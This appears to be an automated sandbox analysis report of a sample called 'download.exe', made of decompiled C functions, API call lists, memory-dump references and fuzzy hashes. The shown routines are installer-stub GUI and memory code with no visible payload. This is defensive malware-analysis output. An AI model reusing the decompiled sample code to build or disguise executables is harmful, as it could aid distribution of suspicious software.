                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: "C:\Users\user\Desktop\download.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 589700163-26238218
                                                      • Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                                                      • Instruction ID: 21773b32b681db819c24220f05ced2ff1897e85ed8b94fc5b560f7e9dc9cebfa
                                                      • Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                                                      • Instruction Fuzzy Hash: D511BF6180479129FB3236240C44BB7AF998F977A0F1A00BFE5D6722C2D67C5CA2966D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00404083(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                      				struct tagLOGBRUSH _v16;
                                                      				long _t39;
                                                      				long _t41;
                                                      				void* _t44;
                                                      				signed char _t50;
                                                      				long* _t54;
                                                      
                                                      				if(_a4 + 0xfffffecd > 5) {
                                                      					L18:
                                                      					return 0;
                                                      				}
                                                      				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                      				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                      					goto L18;
                                                      				} else {
                                                      					_t50 = _t54[5];
                                                      					if((_t50 & 0xffffffe0) != 0) {
                                                      						goto L18;
                                                      					}
                                                      					_t39 =  *_t54;
                                                      					if((_t50 & 0x00000002) != 0) {
                                                      						_t39 = GetSysColor(_t39);
                                                      					}
                                                      					if((_t54[5] & 0x00000001) != 0) {
                                                      						SetTextColor(_a8, _t39);
                                                      					}
                                                      					SetBkMode(_a8, _t54[4]);
                                                      					_t41 = _t54[1];
                                                      					_v16.lbColor = _t41;
                                                      					if((_t54[5] & 0x00000008) != 0) {
                                                      						_t41 = GetSysColor(_t41);
                                                      						_v16.lbColor = _t41;
                                                      					}
                                                      					if((_t54[5] & 0x00000004) != 0) {
                                                      						SetBkColor(_a8, _t41);
                                                      					}
                                                      					if((_t54[5] & 0x00000010) != 0) {
                                                      						_v16.lbStyle = _t54[2];
                                                      						_t44 = _t54[3];
                                                      						if(_t44 != 0) {
                                                      							DeleteObject(_t44);
                                                      						}
                                                      						_t54[3] = CreateBrushIndirect( &_v16);
                                                      					}
                                                      					return _t54[3];
                                                      				}
                                                      			}










                                                      APIs
                                                      • GetWindowLongA.USER32(?,000000EB), ref: 004040A0
                                                      • GetSysColor.USER32(00000000), ref: 004040DE
                                                      • SetTextColor.GDI32(?,00000000), ref: 004040EA
                                                      • SetBkMode.GDI32(?,?), ref: 004040F6
                                                      • GetSysColor.USER32(?), ref: 00404109
                                                      • SetBkColor.GDI32(?,?), ref: 00404119
                                                      • DeleteObject.GDI32(?), ref: 00404133
                                                      • CreateBrushIndirect.GDI32(?), ref: 0040413D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                                      • Instruction ID: 14bb72118498863180d434f19a0418890adeb1616dfc149a02695bee4dee3a88
                                                      • Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                                      • Instruction Fuzzy Hash: 422162715007049BCB309F68DD4CB5BBBF8AF91714B04893EEA96A62E0D734E984CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E706B2498(intOrPtr* _a4) {
                                                      				char _v80;
                                                      				int _v84;
                                                      				intOrPtr _v88;
                                                      				short _v92;
                                                      				intOrPtr* _t28;
                                                      				void* _t30;
                                                      				intOrPtr _t31;
                                                      				signed int _t43;
                                                      				void* _t44;
                                                      				intOrPtr _t45;
                                                      				void* _t48;
                                                      
                                                      				_t44 = E706B1215();
                                                      				_t28 = _a4;
                                                      				_t45 =  *((intOrPtr*)(_t28 + 0x814));
                                                      				_v88 = _t45;
                                                      				_t48 = (_t45 + 0x41 << 5) + _t28;
                                                      				do {
                                                      					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
                                                      					}
                                                      					_t43 =  *(_t48 - 8) & 0x000000ff;
                                                      					if(_t43 <= 7) {
                                                      						switch( *((intOrPtr*)(_t43 * 4 +  &M706B25E6))) {
                                                      							case 0:
                                                      								 *_t44 = 0;
                                                      								goto L17;
                                                      							case 1:
                                                      								__eax =  *__eax;
                                                      								if(__ecx > __ebx) {
                                                      									_v84 = __ecx;
                                                      									__ecx =  *(0x706b307c + __edx * 4);
                                                      									__edx = _v84;
                                                      									__ecx = __ecx * __edx;
                                                      									asm("sbb edx, edx");
                                                      									__edx = __edx & __ecx;
                                                      									__eax = __eax &  *(0x706b309c + __edx * 4);
                                                      								}
                                                      								_push(__eax);
                                                      								goto L15;
                                                      							case 2:
                                                      								__eax = E706B1429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                      								goto L16;
                                                      							case 3:
                                                      								__eax = lstrcpynA(__edi,  *__eax,  *0x706b405c);
                                                      								goto L17;
                                                      							case 4:
                                                      								__ecx =  *0x706b405c;
                                                      								__edx = __ecx - 1;
                                                      								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
                                                      								__eax =  *0x706b405c;
                                                      								 *((char*)(__eax + __edi - 1)) = __bl;
                                                      								goto L17;
                                                      							case 5:
                                                      								__ecx =  &_v80;
                                                      								_push(0x27);
                                                      								_push(__ecx);
                                                      								_push( *__eax);
                                                      								__imp__StringFromGUID2();
                                                      								__eax =  &_v92;
                                                      								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x706b405c, __ebx, __ebx);
                                                      								goto L17;
                                                      							case 6:
                                                      								_push( *__esi);
                                                      								L15:
                                                      								__eax = wsprintfA(__edi, 0x706b4000);
                                                      								L16:
                                                      								__esp = __esp + 0xc;
                                                      								goto L17;
                                                      						}
                                                      					}
                                                      					L17:
                                                      					_t30 =  *(_t48 + 0x14);
                                                      					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
                                                      						GlobalFree(_t30);
                                                      					}
                                                      					_t31 =  *((intOrPtr*)(_t48 + 0xc));
                                                      					if(_t31 != 0) {
                                                      						if(_t31 != 0xffffffff) {
                                                      							if(_t31 > 0) {
                                                      								E706B12D1(_t31 - 1, _t44);
                                                      								goto L26;
                                                      							}
                                                      						} else {
                                                      							E706B1266(_t44);
                                                      							L26:
                                                      						}
                                                      					}
                                                      					_v88 = _v88 - 1;
                                                      					_t48 = _t48 - 0x20;
                                                      				} while (_v88 >= 0);
                                                      				return GlobalFree(_t44);
                                                      			}















                                                      APIs
                                                        • Part of subcall function 706B1215: GlobalAlloc.KERNEL32(00000040,706B1233,?,706B12CF,-706B404B,706B11AB,-000000A0), ref: 706B121D
                                                      • GlobalFree.KERNEL32(?), ref: 706B259E
                                                      • GlobalFree.KERNEL32(00000000), ref: 706B25D8
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1880663434.00000000706B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 706B0000, based on PE: true
                                                      • Associated: 00000002.00000002.1880594487.00000000706B0000.00000002.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000002.00000002.1880732550.00000000706B3000.00000002.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000002.00000002.1880781272.00000000706B5000.00000002.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_706b0000_download.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$Alloc
                                                      • String ID:
                                                      • API String ID: 1780285237-0
                                                      • Opcode ID: fa37ca8ede957534c4b84db16e7d92aeabf740163e69bf1b0777a9e075933cb6
                                                      • Instruction ID: 3e1716e900e87e64f1c04dc76abefcd1a30c109030028d3b3d7907fb9f2120ab
                                                      • Opcode Fuzzy Hash: fa37ca8ede957534c4b84db16e7d92aeabf740163e69bf1b0777a9e075933cb6
                                                      • Instruction Fuzzy Hash: 5C419EF3204186EFC3229F54CCB8D6E77FBEB89600B304A29F60186290C739AD049B61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040496F(struct HWND__* _a4, intOrPtr _a8) {
                                                      				long _v8;
                                                      				signed char _v12;
                                                      				unsigned int _v16;
                                                      				void* _v20;
                                                      				intOrPtr _v24;
                                                      				long _v56;
                                                      				void* _v60;
                                                      				long _t15;
                                                      				unsigned int _t19;
                                                      				signed int _t25;
                                                      				struct HWND__* _t28;
                                                      
                                                      				_t28 = _a4;
                                                      				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                      				if(_a8 == 0) {
                                                      					L4:
                                                      					_v56 = _t15;
                                                      					_v60 = 4;
                                                      					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                      					return _v24;
                                                      				}
                                                      				_t19 = GetMessagePos();
                                                      				_v16 = _t19 >> 0x10;
                                                      				_v20 = _t19;
                                                      				ScreenToClient(_t28,  &_v20);
                                                      				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                      				if((_v12 & 0x00000066) != 0) {
                                                      					_t15 = _v8;
                                                      					goto L4;
                                                      				}
                                                      				return _t25 | 0xffffffff;
                                                      			}

                                                      APIs
                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040498A
                                                      • GetMessagePos.USER32 ref: 00404992
                                                      • ScreenToClient.USER32(?,?), ref: 004049AC
                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049BE
                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                      • Instruction ID: a28b31c987ffe71ebed06cd45d35d2090213a5ff436324a44693cf4fbc71b07e
                                                      • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                      • Instruction Fuzzy Hash: F7015EB5900219BAEB00DBA5DD85BFFBBBCAF55711F10412BBB51B61C0C7B49901CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E706B22B1(void* __edx, intOrPtr _a4) {
                                                      				signed int _v4;
                                                      				signed int _v8;
                                                      				void* _t38;
                                                      				signed int _t39;
                                                      				void* _t40;
                                                      				void* _t43;
                                                      				void* _t48;
                                                      				signed int* _t50;
                                                      				signed char* _t51;
                                                      
                                                      				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
                                                      				while(1) {
                                                      					_t9 = _a4 + 0x818; // 0x818
                                                      					_t51 = (_v8 << 5) + _t9;
                                                      					_t38 = _t51[0x18];
                                                      					if(_t38 == 0) {
                                                      						goto L9;
                                                      					}
                                                      					_t48 = 0x1a;
                                                      					if(_t38 == _t48) {
                                                      						goto L9;
                                                      					}
                                                      					if(_t38 != 0xffffffff) {
                                                      						if(_t38 <= 0 || _t38 > 0x19) {
                                                      							_t51[0x18] = _t48;
                                                      						} else {
                                                      							_t38 = E706B12AD(_t38 - 1);
                                                      							L10:
                                                      						}
                                                      						goto L11;
                                                      					} else {
                                                      						_t38 = E706B123B();
                                                      						L11:
                                                      						_t43 = _t38;
                                                      						_t13 =  &(_t51[8]); // 0x820
                                                      						_t50 = _t13;
                                                      						if(_t51[4] >= 0) {
                                                      						}
                                                      						_t39 =  *_t51 & 0x000000ff;
                                                      						_t51[0x1c] = _t51[0x1c] & 0x00000000;
                                                      						_v4 = _t39;
                                                      						if(_t39 > 7) {
                                                      							L27:
                                                      							_t40 = GlobalFree(_t43);
                                                      							if(_v8 == 0) {
                                                      								return _t40;
                                                      							}
                                                      							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
                                                      								_v8 = _v8 + 1;
                                                      							} else {
                                                      								_v8 = _v8 & 0x00000000;
                                                      							}
                                                      							continue;
                                                      						} else {
                                                      							switch( *((intOrPtr*)(_t39 * 4 +  &M706B243E))) {
                                                      								case 0:
                                                      									 *_t50 =  *_t50 & 0x00000000;
                                                      									goto L27;
                                                      								case 1:
                                                      									__eax = E706B12FE(__ebx);
                                                      									goto L20;
                                                      								case 2:
                                                      									 *__ebp = E706B12FE(__ebx);
                                                      									_a4 = __edx;
                                                      									goto L27;
                                                      								case 3:
                                                      									__eax = E706B1224(__ebx);
                                                      									 *(__esi + 0x1c) = __eax;
                                                      									L20:
                                                      									 *__ebp = __eax;
                                                      									goto L27;
                                                      								case 4:
                                                      									 *0x706b405c =  *0x706b405c +  *0x706b405c;
                                                      									__edi = GlobalAlloc(0x40,  *0x706b405c +  *0x706b405c);
                                                      									 *0x706b405c = MultiByteToWideChar(0, 0, __ebx,  *0x706b405c, __edi,  *0x706b405c);
                                                      									if(_v4 != 5) {
                                                      										 *(__esi + 0x1c) = __edi;
                                                      										 *__ebp = __edi;
                                                      									} else {
                                                      										__eax = GlobalAlloc(0x40, 0x10);
                                                      										_push(__eax);
                                                      										 *(__esi + 0x1c) = __eax;
                                                      										_push(__edi);
                                                      										 *__ebp = __eax;
                                                      										__imp__CLSIDFromString();
                                                      										__eax = GlobalFree(__edi);
                                                      									}
                                                      									goto L27;
                                                      								case 5:
                                                      									if( *__ebx != 0) {
                                                      										__eax = E706B12FE(__ebx);
                                                      										 *__edi = __eax;
                                                      									}
                                                      									goto L27;
                                                      								case 6:
                                                      									__esi =  *(__esi + 0x18);
                                                      									__esi = __esi - 1;
                                                      									__esi = __esi *  *0x706b405c;
                                                      									__esi = __esi +  *0x706b4064;
                                                      									__eax = __esi + 0xc;
                                                      									 *__edi = __esi + 0xc;
                                                      									asm("cdq");
                                                      									__eax = E706B1429(__edx, __esi + 0xc, __edx, __esi);
                                                      									goto L27;
                                                      							}
                                                      						}
                                                      					}
                                                      					L9:
                                                      					_t38 = E706B1224(0x706b4034);
                                                      					goto L10;
                                                      				}
                                                      			}

                                                      APIs
                                                      • GlobalFree.KERNEL32(00000000), ref: 706B2407
                                                        • Part of subcall function 706B1224: lstrcpynA.KERNEL32(00000000,?,706B12CF,-706B404B,706B11AB,-000000A0), ref: 706B1234
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 706B2382
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 706B2397
                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 706B23A8
                                                      • CLSIDFromString.OLE32(00000000,00000000), ref: 706B23B6
                                                      • GlobalFree.KERNEL32(00000000), ref: 706B23BD
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1880663434.00000000706B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 706B0000, based on PE: true
                                                      • Associated: 00000002.00000002.1880594487.00000000706B0000.00000002.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000002.00000002.1880732550.00000000706B3000.00000002.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000002.00000002.1880781272.00000000706B5000.00000002.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_706b0000_download.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                      • String ID:
                                                      • API String ID: 3730416702-0
                                                      • Opcode ID: 4cd094950ff108f6faca9809cec7550df30d3c200c5b12e88587f7797578ee6a
                                                      • Instruction ID: 53da56f3f976d8801fe98dfa257cc1ab947cd491b0cb45c4e2a0a1303b2bc924
                                                      • Opcode Fuzzy Hash: 4cd094950ff108f6faca9809cec7550df30d3c200c5b12e88587f7797578ee6a
                                                      • Instruction Fuzzy Hash: 9B4179F1508382AFD3119F21D864B6EB7EAFF44311F30492AF546CA6C0D778A985CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E0040273C(void* __ebx) {
                                                      				void* _t26;
                                                      				long _t31;
                                                      				void* _t45;
                                                      				void* _t49;
                                                      				void* _t51;
                                                      				void* _t54;
                                                      				void* _t55;
                                                      				void* _t56;
                                                      
                                                      				_t45 = __ebx;
                                                      				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                                      				_t50 = E00402ACB(0xfffffff0);
                                                      				 *(_t56 - 0x34) = _t23;
                                                      				if(E00405982(_t50) == 0) {
                                                      					E00402ACB(0xffffffed);
                                                      				}
                                                      				E00405AF1(_t50);
                                                      				_t26 = E00405B16(_t50, 0x40000000, 2);
                                                      				 *(_t56 + 8) = _t26;
                                                      				if(_t26 != 0xffffffff) {
                                                      					_t31 =  *0x7a2f58; // 0x3fc00
                                                      					 *(_t56 - 0x30) = _t31;
                                                      					_t49 = GlobalAlloc(0x40, _t31);
                                                      					if(_t49 != _t45) {
                                                      						E004031A1(_t45);
                                                      						E0040318B(_t49,  *(_t56 - 0x30));
                                                      						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                      						 *(_t56 - 0x3c) = _t54;
                                                      						if(_t54 != _t45) {
                                                      							_push( *(_t56 - 0x20));
                                                      							_push(_t54);
                                                      							_push(_t45);
                                                      							_push( *((intOrPtr*)(_t56 - 0x24)));
                                                      							E00402F9C();
                                                      							while( *_t54 != _t45) {
                                                      								_t47 =  *_t54;
                                                      								_t55 = _t54 + 8;
                                                      								 *(_t56 - 0x84) =  *_t54;
                                                      								E00405AD1( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                      								_t54 = _t55 +  *(_t56 - 0x84);
                                                      							}
                                                      							GlobalFree( *(_t56 - 0x3c));
                                                      						}
                                                      						E00405BBD( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                                                      						GlobalFree(_t49);
                                                      						_push(_t45);
                                                      						_push(_t45);
                                                      						_push( *(_t56 + 8));
                                                      						_push(0xffffffff);
                                                      						 *((intOrPtr*)(_t56 - 0xc)) = E00402F9C();
                                                      					}
                                                      					CloseHandle( *(_t56 + 8));
                                                      				}
                                                      				_t51 = 0xfffffff3;
                                                      				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                                      					_t51 = 0xffffffef;
                                                      					DeleteFileA( *(_t56 - 0x34));
                                                      					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                      				}
                                                      				_push(_t51);
                                                      				E00401423();
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t56 - 4));
                                                      				return 0;
                                                      			}












                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,0003FC00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
                                                      • GlobalFree.KERNEL32(?), ref: 004027EB
                                                      • GlobalFree.KERNEL32(00000000), ref: 004027FE
                                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
                                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                      • String ID:
                                                      • API String ID: 2667972263-0
                                                      • Opcode ID: 74498b9771c20a0aa9e24b593dedaeec913bd55a0e575eb972961abdc8cc0048
                                                      • Instruction ID: a3aa65fdc26674a25697bbf1b98d1dc7df5c11bc78c453e7b8258ed70cc26f26
                                                      • Opcode Fuzzy Hash: 74498b9771c20a0aa9e24b593dedaeec913bd55a0e575eb972961abdc8cc0048
                                                      • Instruction Fuzzy Hash: 41219F71800124BBDF207FA5CE89DAE7B79AF49364F14823AF510762E0CB794D419F68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00401D41(int __edx) {
                                                      				void* _t17;
                                                      				struct HINSTANCE__* _t21;
                                                      				struct HWND__* _t25;
                                                      				void* _t27;
                                                      
                                                      				_t25 = GetDlgItem( *(_t27 - 8), __edx);
                                                      				GetClientRect(_t25, _t27 - 0x48);
                                                      				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402ACB(_t21), _t21,  *(_t27 - 0x40) *  *(_t27 - 0x20),  *(_t27 - 0x3c) *  *(_t27 - 0x20), 0x10));
                                                      				if(_t17 != _t21) {
                                                      					DeleteObject(_t17);
                                                      				}
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t27 - 4));
                                                      				return 0;
                                                      			}








                                                      APIs
                                                      • GetDlgItem.USER32(?), ref: 00401D45
                                                      • GetClientRect.USER32(00000000,?), ref: 00401D52
                                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
                                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
                                                      • DeleteObject.GDI32(00000000), ref: 00401D90
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: bf334a0d68def9d539a0386b9da46a64024a4d055d9233935bf9dbd7a5019d3b
                                                      • Instruction ID: 86ae4d2b40e720423d53cfa3fe8a52c583987269cec1c9f3ad3a23d9d9d7ea30
                                                      • Opcode Fuzzy Hash: bf334a0d68def9d539a0386b9da46a64024a4d055d9233935bf9dbd7a5019d3b
                                                      • Instruction Fuzzy Hash: F6F0AFB2600515BFDB01EBE4DE89DEFB7BCEB44345B14446AF641F6191CA749D018B38
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E00404865(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                      				char _v36;
                                                      				char _v68;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t21;
                                                      				signed int _t22;
                                                      				void* _t29;
                                                      				void* _t31;
                                                      				void* _t32;
                                                      				void* _t41;
                                                      				signed int _t43;
                                                      				signed int _t47;
                                                      				signed int _t50;
                                                      				signed int _t51;
                                                      				signed int _t53;
                                                      
                                                      				_t21 = _a16;
                                                      				_t51 = _a12;
                                                      				_t41 = 0xffffffdc;
                                                      				if(_t21 == 0) {
                                                      					_push(0x14);
                                                      					_pop(0);
                                                      					_t22 = _t51;
                                                      					if(_t51 < 0x100000) {
                                                      						_push(0xa);
                                                      						_pop(0);
                                                      						_t41 = 0xffffffdd;
                                                      					}
                                                      					if(_t51 < 0x400) {
                                                      						_t41 = 0xffffffde;
                                                      					}
                                                      					if(_t51 < 0xffff3333) {
                                                      						_t50 = 0x14;
                                                      						asm("cdq");
                                                      						_t22 = 1 / _t50 + _t51;
                                                      					}
                                                      					_t23 = _t22 & 0x00ffffff;
                                                      					_t53 = _t22 >> 0;
                                                      					_t43 = 0xa;
                                                      					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                      				} else {
                                                      					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                      					_t47 = 0;
                                                      				}
                                                      				_t29 = E00405F9F(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                      				_t31 = E00405F9F(_t41, _t47, _t53,  &_v68, _t41);
                                                      				_t32 = E00405F9F(_t41, _t47, 0x79f540, 0x79f540, _a8);
                                                      				wsprintfA(_t32 + lstrlenA(0x79f540), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                      				return SetDlgItemTextA( *0x7a2718, _a4, 0x79f540);
                                                      			}




















                                                      APIs
                                                      • lstrlenA.KERNEL32(0079F540,0079F540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404780,000000DF,00000000,00000400,-007A4000), ref: 00404903
                                                      • wsprintfA.USER32 ref: 0040490B
                                                      • SetDlgItemTextA.USER32(?,0079F540), ref: 0040491E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s
                                                      • API String ID: 3540041739-3551169577
                                                      • Opcode ID: 5f074f6faf701013ce45bc378f4b03b5d4ee46098f1275575472d42f1ef86f4b
